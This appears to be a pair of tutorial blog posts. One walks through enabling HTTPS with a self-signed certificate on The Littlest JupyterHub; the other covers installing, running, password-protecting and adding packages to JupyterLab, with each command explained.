req # Command to create a certificate signing request (CSR) or self-signed certificate.
-x509 # Creates a self-signed certificate instead of generating a CSR to send to a certificate authority.
-newkey rsa:4096 # Generates a new RSA key pair with 4096-bit encryption.
-keyout key.pem # Specifies the filename for the private key.
-out cert.pem # Specifies the filename for the certificate itself.
-sha256 # Uses the SHA-256 hash algorithm for signing the certificate.
-days 3650 # Sets the certificate validity to 3650 days (~10 years).
-nodes # Stands for “no DES” — the private key will not be encrypted with a passphrase. Needed for services that start automatically, like JupyterHub, so you don’t have to type a password on startup.
-subj “/C=US/ST=Washington/L=Vancover/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname” # Provides certificate details in a single line, C: Country (US), ST: State (Washington), L: City (Vancover), O: Organization (CompanyName), OU: Organizational Unit (CompanySectionName), CN: Common Name or Hostname (e.g., example.com or your server IP))
```
(VM) $ sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=US/ST=Washington/L=Vancover/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"
```
sudo # Runs the command with administrator privileges. Needed because /etc/https is a system directory.
chown # Linux command to change the ownership of files and directories.
root # Specifies the new owner.
-R # Stands for recursive. Applies the ownership change to all files and subdirectories inside /etc/https.
/etc/https # The directory to change ownership for and everything inside it).
```
(VM) $ sudo chown root -R /etc/https
```
sudo # Runs the command with administrator privileges because /etc/https is a system directory.
chmod # Linux command to change file permissions.
0600 # Permission mode in octal format. Only root can read/write the files; nobody else can access them: Owner (root) → read & write (6), Group → no permissions (0), Others → no permissions (0)
-R # Stands for recursive. Applies permissions to all files and subdirectories under /etc/https.
/etc/https # The directory being modified, containing your SSL certificate and private key
```
(VM) $ sudo chmod 0600 -R /etc/https
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.key # The configuration key specifying the path to the TLS private key for HTTPS.
/etc/https/key.pem # The path to the private key file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.key /etc/https/key.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.cert # The configuration key specifying the path to the TLS certificate for HTTPS
/etc/https/cert.pem # The path to your SSL certificate file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.cert /etc/https/cert.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.enabled # The TLJH configuration key that turns HTTPS on or off
true # Sets the value of https.enabled to true, enabling HTTPS for JupyterHub
```
(VM) $ sudo tljh-config set https.enabled true
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
proxy # Specifies that only the reverse proxy service should be reloaded
```
(VM) $ sudo tljh-config reload proxy
```
Type the IP address of the JupyterHub Server and create an exception for the self-signed certification
March 29, 2026
JupyterLab
JupyterLab

JupyterLab is an open-source web-based interactive development environment primarily used for data science, scientific computing, and machine learning. It allows users to create and manage interactive documents that combine live code, visualizations, equations, and narrative text in a single workspace. These documents are saved with the .ipynb extension, which stands for IPython Notebook, reflecting its origins in the IPython project.

Unlike traditional text editors or IDEs, JupyterLab provides a highly flexible interface that lets users open multiple notebooks, terminals, text files, and data viewers simultaneously in tabs or split screens. It supports numerous programming languages, with Python being the most common, and offers extensive integration with libraries for data analysis, plotting, and machine learning, such as NumPy, pandas, Matplotlib, and TensorFlow.

Key features of JupyterLab include:
- Interactive code execution: Run code in real-time, see outputs immediately, and modify code cells independently.
- Rich media support: Embed images, videos, interactive plots, and LaTeX equations directly within notebooks.
- Extensible interface: Customize the environment with extensions like version control, debugging tools, or additional language kernels.
- Collaboration and sharing: Notebooks can be shared with others, exported to multiple formats (HTML, PDF, Markdown), or run on cloud platforms like Google Colab or Binder.
Overall, JupyterLab is a powerful tool for data exploration, analysis, and presentation, combining code execution and documentation into a single cohesive platform.

Installing JupyterLab on Windows
1. Install Python (Make sure to check mark the Add Python X To Path in the installation window)
2. Go to the CMD and install jupyterlab using pip install jupyterlab
Installing JupyterLab on Linux-based OS (Ubuntu)
1. Go to the terminal
  1. Install Python using sudo apt-get install python3
  2. Install pip using sudo apt-get install python3-pip
  3. Install jupyterlab using pip3 install jupyterlab
Installing JupyterLab on MacOS
1. Go to the terminal
  1. Install jupyterlab using pip3 install jupyterlab
In some operating systems, such as Windows, the pip command is aliased to pip3.

Alternatives

*If you are having issues with installing JupyterLab, use, use Visual Studio Code or any environment that supports that
- Jupyter Notebooks in VS Code
Running JupyterLab

You can use the interactive interface using the JupyterLab command in the terminal or command line interpreter. That command takes different switches, and the one that we will use is lab (You may need to elevate privileges). You may need to close the terminal or CMD before running the jupyterlab command because new environment variables are added (the easiest way to refresh them is to simply close the terminal or CMD and open it again).

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
```
or

python # Starts the Python interpreter
-m # Tells Python to run a module as a script, instead of running a .py file
jupyterlab # The name of the Python module being executed
```
(Host) python -m jupyterlab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
The browser will open and show the interactive interface. If the browser did not open, you can open the browser and open the URL shown from the terminal or command line interpreter

Create a Jupyter Notebook

You can create a notebook by clicking on File, then New, then Notebook. Or, you can click on the following icon

You can change the newly created file name by right-clicking on the file tab, then Rename Notebook

In the notebook file, make sure that code is selected and type print("test")

To execute the code, click the play icon; your code will run, and the result is shown in the next line. You can re-execute this block as many times as you want

Magic Commands

Also known as magic functions, these are commands that modify the behavior or code explicitly, extending the notebook’s capabilities. Some of them allow users to escape the Python interpreter. E.g., you can run a shell command and capture its output by using the ! character before the command. This is helpful when the user is limited to the notebook interface.

If you try to the whoami command, it will fail because it will be interrupted as Python code

If you try the whoami command, it will fail because it will be interrupted as Python code

Shutting down JupyterLab

You can shut down the Jupyter lab from the terminal or command line interrupter by using CTRL with C or X. Or, go File, then shutdown

Setting up Password

You can configure a password for JupyterLab that must be entered before a user can access the interface, ensuring secure access to the environment

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
password # Option to setup/change password
```
(Host) jupyter lab password
Enter password: 
Verify password: 
[JupyterPasswordApp] Wrote hashed password to /Users/user/.jupyter/jupyter_server_config.json
```
jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
External Modules

The following are some of the external modules used in data analysis and visualization
- numpy – a library for large multidimensional arrays
- pandas – a library for data analysis
- matplotlib – a library for creating interactive visualizations
Install Modules

You can install all the modules using the install switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
install # A command to download and install libraries from PyPI (Python Package Index
numpy # Library for numerical computing, arrays, and matrices.
pandas # Library for data manipulation and analysis, especially tabular data.
matplotlib # Library for creating plots and visualizations in Python.
beautifulsoup4 # Library for parsing HTML and XML, often used in web scraping.
lxml # Library for fast XML and HTML parsing, used by BeautifulSoup for speed and reliability.
selenium # Library for automating web browsers, often used for testing or web scraping dynamic websites.
webdriver-manager # Library to automatically download and manage browser drivers for Selenium, like ChromeDriver or GeckoDriver.
```
!pip install numpy pandas matplotlib beautifulsoup4 lxml selenium webdriver-manager
```
Review Modules

You can review all installed module using the list switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
list # A command to list all installed packages
```
!pip list
```
Remove Modules

You can remove any module using the uninstall switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
list # A command to uninstall a package
xyz # A package to uninstall from the system
```
!pip uninstall xyz
```
March 29, 2026